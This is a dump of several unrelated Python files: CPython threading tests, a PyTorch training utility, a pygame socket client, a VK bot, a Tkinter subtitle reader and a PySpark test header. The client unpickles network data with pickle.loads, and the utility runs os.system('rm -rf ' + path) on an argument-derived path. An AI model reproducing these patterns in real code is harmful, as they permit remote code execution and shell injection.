class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
if args.test_only:
os.makedirs(self.get_path('results-{}'.format(args.save_dir_suffix)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt')) else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
# TODO
trainer.lossv.save(self.dir)
trainer.lossv.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
label = 'SR on {}'.format(self.args.save_dir_suffix)
fig = plt.figure()
plt.title(label)
plt.plot(
axis,
self.log.numpy(),
label='Scale {}'.format(self.args.scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(self.args.save_dir_suffix)))
plt.close(fig)
def begin_background(self):
# Queue是python标准库中的线程安全的队列(FIFO)实现,
# 提供了一个适用于多线程编程的先进先出的数据结构,即队列
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, filename, save_list, params=None):
shape = save_list[0].shape[2:]
if self.args.apply_feild_data:
save_name = filename.split('_')[0]
else:
save_name = filename
if self.args.apply_feild_data:
filename = self.get_path(
f'results-{self.args.save_dir_suffix}',
f'{save_name}_{shape[1]}x{shape[0]}.dat')
else:
filename = self.get_path(
f'results-{self.args.save_dir_suffix}',
f'{save_name}.dat')
for v in save_list:
sa = v[0][0].cpu().numpy()
[ma, mi] = [params[0].cpu().numpy(), params[1].cpu().numpy()]
sa = sa * (ma - mi) + mi
sa = np.array(sa, dtype=np.float32)
sa = np.rot90(sa, -3)
sa.tofile(filename)
def calc_psnr(sr, hr, scale, data_range=1):
if hr.nelement() == 1: return 0
diff = (sr - hr) / data_range
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
target: model
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_last_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
|
client.py
|
import socket
import time
import select
import pygame
import pickle
from threading import Thread
pygame.init()
class Client():
def __init__(self):
self.serverHost = "127.0.0.1"
self.serverPort = 5000
self.s = None
def connect(self):
self.s = socket.socket()
self.s.connect((self.serverHost, self.serverPort))
self.s.setblocking(0)
def messageServer(self, message):
self.s.send(message)
def recv(self):
data = self.s.recv(4096)
#print("Recieved from server:", data)
game.handleServerMessage(data)
def close(self):
self.s.close()
def serverThread(client):
client.connect()
print("Client connected")
while True:
#Check if there's data ready
ready = select.select([client.s], [], [], 0.1)
if ready[0]:
client.recv()
s.close()
class Player():
def __init__(self, posX, posY):
self.posX = posX
self.posY = posY
self.width = 50
self.height = 50
self.movX = 0
self.movY = 0
self.velocity = 3
self.playerID = ""
self.clientID = ""
def setMov(self, movX, movY):
self.movX = movX
self.movY = movY
def updatePos(self):
self.posX = self.posX + (self.movX * self.velocity)
self.posY = self.posY + (self.movY * self.velocity)
class Game():
def __init__(self):
self.client = None
self.serverT = None
self.fps = 60
self.fpsClock = pygame.time.Clock()
self.width = 640
self.height = 480
self.screen = pygame.display.set_mode((self.width, self.height))
self.player = Player(self.width/2, self.height/2)
self.client = None
self.otherPlayers = []
def startGame(self):
#Setup network thread and client
self.client = Client()
serverT = Thread(target=serverThread, args=(self.client,)).start()
#//TODO: It waits 1 sec for a connection there's a better way to do this
time.sleep(1)
def drawScreen(self):
#Draw other players
for player in self.otherPlayers:
pygame.draw.rect(self.screen, (255,0,0), (player.posX, player.posY, player.width, player.height))
#Draw player rect
pygame.draw.rect(self.screen, (0,255,255), (self.player.posX, self.player.posY, self.player.width, self.player.height))
pygame.display.flip()
def handlePlayerMovement(self):
#Handle 8 directional movement
keys_pressed = pygame.key.get_pressed()
movX = 0
movY = 0
if keys_pressed[pygame.K_w]:
movY = -1
elif keys_pressed[pygame.K_s]:
movY = 1
else:
movY = 0
if keys_pressed[pygame.K_d]:
movX = 1
elif keys_pressed[pygame.K_a]:
movX = -1
else:
movX = 0
self.player.setMov(movX, movY)
self.player.updatePos()
def handleServerMessage(self, message):
#The message format is: name, clientID, object
message = pickle.loads(message)
if message[0] == "setID":
self.player.clientID = message[2]
print(f"Recieved 'setID' from Client Number: {message[1]} -> {message[2]}")
elif message[0] == "playerObject":
#print(f"Recieved 'playerObject' from Client Number: {message[1]} -> {message[2]}")
self.handlePlayerObjectRecieved(message)
else:
print("Weird mesage:", message)
def handlePlayerObjectRecieved(self, message):
#print(f"Recieved 'playerObject' from Client Number: {message[1]} -> {message[2]}")
messageClientID = message[1]
messagePlayerObject = message[2]
print(self.otherPlayers)
if messageClientID == self.player.clientID:
pass
else:
#Now we know the data is coming from a different client
#Remove duplicate object so it isn't interacted with multiple times
for otherPlayer in self.otherPlayers:
if otherPlayer.clientID == messagePlayerObject.clientID:
self.otherPlayers.remove(otherPlayer)
self.otherPlayers.append(messagePlayerObject)
#print(messageClientID, messagePlayerObject.posX, messagePlayerObject.posY)
def loop(self):
self.screen.fill((0,0,0))
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
self.fpsClock.tick(self.fps)
self.handlePlayerMovement()
self.drawScreen()
#message = input("-> ")
toDump = ["playerObject", self.player.clientID, self.player]
message = pickle.dumps(toDump)
self.client.messageServer(message)
def Main():
game.startGame()
while True:
game.loop()
if __name__ == "__main__":
game = Game()
Main()
|
VkBot.py
|
import json
import threading
import vk_api
from vk_api import VkApi, VkUpload
from vk_api.bot_longpoll import VkBotLongPoll
from vk_api.utils import get_random_id
from apps.bot.classes.bots.Bot import Bot as CommonBot
from apps.bot.classes.consts.ActivitiesEnum import VK_ACTIVITIES, ActivitiesEnum
from apps.bot.classes.consts.Consts import Platform
from apps.bot.classes.events.VkEvent import VkEvent
from apps.bot.classes.messages.ResponseMessage import ResponseMessageItem, ResponseMessage
from apps.bot.classes.messages.attachments.PhotoAttachment import PhotoAttachment
from apps.bot.commands.Profile import add_city_to_db
from apps.bot.models import Bot as BotModel, Profile, User
from petrovich.settings import env, VK_URL
class VkBot(CommonBot):
def __init__(self):
CommonBot.__init__(self, Platform.VK)
self.token = env.str('VK_BOT_TOKEN')
self.group_id = env.str('VK_BOT_GROUP_ID')
vk_session = VkApi(token=self.token, api_version="5.131", config_filename="secrets/vk_bot_config.json")
self.longpoll = MyVkBotLongPoll(vk_session, group_id=self.group_id)
self.upload = VkUpload(vk_session)
self.vk = vk_session.get_api()
# MAIN ROUTING AND MESSAGING
def listen(self):
"""
Получение новых событий и их обработка
"""
for raw_event in self.longpoll.listen():
vk_event = VkEvent(raw_event, self)
threading.Thread(target=self.handle_event, args=(vk_event,)).start()
def send_response_message(self, rm: ResponseMessage):
"""
Отправка ResponseMessage сообщения
"""
for msg in rm.messages:
try:
self.send_response_message_item(msg)
except vk_api.exceptions.ApiError as e:
if e.code not in [901, 917]:
error_msg = "Непредвиденная ошибка. Сообщите разработчику. Команда /баг"
error_rm = ResponseMessage(error_msg, msg.peer_id).messages[0]
self.logger.error({'result': error_msg, 'error': str(e)})
self.send_response_message_item(error_rm)
def send_response_message_item(self, rm: ResponseMessageItem):
"""
Отправка сообщения
"""
text = str(rm.text)
if len(text) > 4096:
text = text[:4092]
text += "\n..."
attachments = []
for att in rm.attachments:
if isinstance(att, str):
attachments.append(att)
elif att.url:
attachments.append(att.url)
elif att.public_download_url:
attachments.append(att.public_download_url)
self.vk.messages.send(
peer_id=rm.peer_id,
message=text,
access_token=self.token,
random_id=get_random_id(),
attachment=','.join(attachments),
keyboard=json.dumps(rm.keyboard),
)
# END MAIN ROUTING AND MESSAGING
# ATTACHMENTS
def upload_photos(self, images, max_count=10, peer_id=None):
"""
Загрузка фотографий на сервер ТГ.
images: список изображений в любом формате (ссылки, байты, файлы)
При невозможности загрузки одной из картинки просто пропускает её
"""
atts = super().upload_photos(images, max_count)
parsed_atts = []
for pa in atts:
try:
url, public_download_url = self.upload_photo_and_urls(pa)
pa.url = url.replace(VK_URL, '')
pa.public_download_url = public_download_url
parsed_atts.append(pa)
except Exception:
continue
return parsed_atts
def upload_photo_and_urls(self, image: PhotoAttachment):
"""
Загрузка изображения на сервер VK
Возвращает vk_url и public_download_url
"""
vk_photo = self.upload.photo_messages(image.get_bytes_io_content())[0]
vk_url = f"{VK_URL}photo{vk_photo['owner_id']}_{vk_photo['id']}"
vk_max_photo_url = sorted(vk_photo['sizes'], key=lambda x: x['height'])[-1]['url']
return vk_url, vk_max_photo_url
def upload_document(self, document, peer_id=None, title='Документ', filename=None):
"""
Загрузка документа на сервер ВК.
"""
da = super().upload_document(document, peer_id, title, filename)
content = da.download_content()
vk_doc = self.upload.document_message(content, title=title, peer_id=peer_id)['doc']
return f"doc{vk_doc['owner_id']}_{vk_doc['id']}"
# END ATTACHMENTS
# USERS GROUPS BOTS
def get_profile_by_user(self, user: User, is_new=False, _defaults: dict = None) -> Profile:
"""
Возвращает пользователя по его id
Регистрирует если пользователя нет в БД
"""
if not user.profile:
vk_user = self.get_user_info(int(user.user_id))
profile = Profile()
profile.name = vk_user['first_name']
profile.surname = vk_user['last_name']
profile.platform = self.platform.name
profile.set_avatar(vk_user['photo_max'])
if 'sex' in vk_user:
profile.gender = vk_user['sex']
if 'city' in vk_user:
from apps.service.models import City
city_name = vk_user['city']['title']
city = City.objects.filter(name__icontains=city_name)
if len(city) > 0:
city = city.first()
else:
try:
city = add_city_to_db(city_name)
except Exception:
city = None
profile.city = city
else:
profile.city = None
if 'screen_name' in vk_user:
user.nickname = vk_user['screen_name']
with self.lock:
profile.save()
user.profile = profile
user.save()
return super().get_profile_by_user(user, is_new=True)
return super().get_profile_by_user(user)
def get_user_info(self, user_id: int):
"""
Получение информации о пользователе
"""
return self.vk.users.get(user_id=user_id, lang='ru', fields='sex, bdate, city, screen_name, photo_max')[0]
def update_profile_avatar(self, profile: Profile, user_id):
"""
Обновление аватара пользователя
"""
user_info = self.get_user_info(user_id)
profile.set_avatar(user_info['photo_max'])
def get_bot_by_id(self, bot_id: int) -> BotModel:
"""
Получение информации о боте
"""
try:
bot = self.bot_model.get(bot_id=bot_id)
except BotModel.DoesNotExist:
bot = super().get_bot_by_id(bot_id)
vk_bot = self.get_bot_info(bot_id)
bot.name = vk_bot['name']
bot.set_avatar(vk_bot['photo_200'])
bot.save()
return bot
def get_bot_info(self, bot_id):
"""
Получение информации о боте
"""
return self.vk.groups.getById(group_id=bot_id)[0]
def update_bot_avatar(self, bot_id):
"""
Обновление аватара бота
"""
bot = self.get_bot_by_id(bot_id)
bot_info = self.get_bot_info(bot_id)
bot.name = bot_info['name']
bot.set_avatar(bot_info['photo_200'])
# END USERS GROUPS BOTS
# EXTRA
def set_activity(self, peer_id, activity: ActivitiesEnum):
"""
Метод позволяет указать пользователю, что бот набирает сообщение или записывает голосовое
Используется при длительном выполнении команд, чтобы был фидбек пользователю, что его запрос принят
"""
tg_activity = VK_ACTIVITIES.get(activity)
if tg_activity:
self.vk.messages.setActivity(type=tg_activity, peer_id=peer_id, group_id=self.group_id)
@staticmethod
def _get_keyboard_buttons(buttons):
"""
Определение структуры кнопок
"""
return [{
'action': {
'type': 'text',
'label': button_item['button_text'],
"payload": json.dumps({
"command": button_item['command'],
"args": button_item.get('args'),
}, ensure_ascii=False)
},
'color': 'primary',
} for button_item in buttons]
def get_inline_keyboard(self, buttons: list, cols=1):
"""
param buttons: ToDo:
Получение инлайн-клавиатуры с кнопками
В основном используется для команд, где нужно запускать много команд и лень набирать заново
"""
keyboard = super().get_inline_keyboard(buttons)
return {
'inline': True,
'buttons': keyboard
}
def get_mention(self, profile: Profile, name=None):
"""
Получение меншона пользователя
"""
user = profile.get_user_by_platform(self.platform)
name = name or str(user)
return f"[id{user.user_id}|{name}]"
def remove_self_from_chat(self, chat_id):
"""
Удаление бота (себя) из чата
"""
self.vk.messages.removeChatUser(chat_id=chat_id, member_id=f"-{self.group_id}")
def get_conversation_messages(self, peer_id, conversation_message_id):
"""
Получение полного сообщения
"""
response = self.vk.messages.getByConversationMessageId(
peer_id=peer_id,
conversation_message_ids=[conversation_message_id]
)
return response['items'][0]
# END EXTRA
class MyVkBotLongPoll(VkBotLongPoll):
def listen(self):
while True:
try:
for event in self.check():
yield event
except Exception as e:
error = {'exception': f'Longpoll Error (VK): {str(e)}'}
print(error)
|
Subreader4.py
|
import pysrt,pyttsx,time
from threading import Thread
from Tkinter import *
from idlelib.idle_test.mock_tk import Event
set1 = 0
set2 = 0
subcount = 0
interupt = 0
settozero = 0
subs = pysrt.open(r"C:\Users\admin\Desktop\Python-files\Deskinfo\eternal-loveSUBS\Eternal.Love_E19.srt")
compsrt = []
def speechafter(subit,x):
try:
engine = pyttsx.init()
engine.setProperty('rate',x)
engine.say(subit.replace('[','').replace(']','').replace('\'','').replace('"','').replace('<i>','').replace('</i>',''))
engine.runAndWait()
except RuntimeError:
print str(set2) + 'FAILD here\n' + subit[:10] + '\n'
def get_ms(t):
return (t.hours*60*60 + t.minutes*60 + t.seconds)*1000 + t.milliseconds
#start speaking
def start_speak1(event):
Thread(target=start_speak).start()
def curset2(val):
global set2
set2 = val
def start_speak():
global set2
try:
inter
if inter == 'asdf':
pass
else:
set2 = subcount
except:
set2 = subcount
for item in range(len(subs)):
if interupt == 5:
while interupt == 5:
pass
else:
start = get_ms(subs[set2].start)
start2 = get_ms(subs[(set2 - 1)].start)
if set2 == 0:
newtime = get_ms(subs[0].start)
print newtime
x = 200
else:
newtime = start - start2
print str(float(newtime) / 1000) + " - Place:" + str(item) + " --- " + (subs[set2].text).replace('\n',' ')
if subs[set2].text.endswith(' zz$'):
x=250
subs[set2].text = subs[set2].text.replace(' zz$', '')
else:
x = 200
curset2(set2)
global settozero
if settozero == 5:
newtime = 0
settozero = 0
else:
pass
time.sleep(float(newtime) / 1000)
lblsub.config(text=(subs[set2].text))
var.set(set2 +1)
Thread(target=speechafter,args=(subs[set2].text, x)).start()
set2 += 1
for sub in subs:
start = get_ms(sub.start)
char = len(sub.text)
time_need = int((char / 3.0) / (200.0/60.0) * 1000.0)
if (sub.end - sub.start) > int(time_need):
pass
else:
time_need = int((char / 3.0) / (250.0/60.0) * 1000.0)
subs[set1].end = (subs[set1].start + time_need + 100)
subs[set1].text = subs[set1].text + ' zz$'
try:
if subs[set1].end >= subs[(set1 +1)].start:
subs[(set1 +1)].start = (subs[set1].end)
else:
pass
except IndexError:
pass
set1 +=1
compsrt.append(str(set1) + '\n' + str(sub.start) + " - " + str(sub.end) + '\n' + str(sub.text) + '\n\n')
ed = open('compsrt.txt', 'w')
for i in compsrt:
ed.write(i)
ed.close()
# print sub.end,sub.start
# print (sub.end - sub.start)
# print int(time_need)
# print sub.text
# if (sub.end - sub.start) < int(time_need):
# pass
# set2 += 1
# else:
# pass
root = Tk()
root.wm_minsize(root.winfo_screenwidth() - 25, 200)
var = StringVar()
def nextline(event):
global inter
inter = 'asdf'
global set2
set2 = set2 + 1
print set2
print subs[set2].text
lblsub.config(text=(subs[set2].text))
def pause(event):
global settozero
settozero = 5
global interupt
if interupt == 5:
interupt = 0
else:
interupt = 5
def backline(event):
global inter
inter = 'asdf'
global set2
set2 = set2 - 1
print subs[set2].text
lblsub.config(text=(subs[set2].text))
def enterline(line):
global inter
inter = 'asdf'
global set2
set2 = int(line)-1
print line
root.attributes("-topmost", True)
lblsub = Label(root,text='',font='comic 45',height=2,bg='gray')
lblsub.pack(fill=X)
lblcount = Label(root,textvariable=var)
lblcount.pack(fill=X)
ent = Entry(root)
ent.pack(fill=X)
ent.bind('<Return>', lambda e: enterline(ent.get()))
lbl = Label(root,text="start")
lbl.pack(fill=X)
lbl.bind("<Button-1>",start_speak1)
root.bind('<Right>', nextline)
root.bind('<Down>', pause)
root.bind('<Left>', backline)
root.mainloop()
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
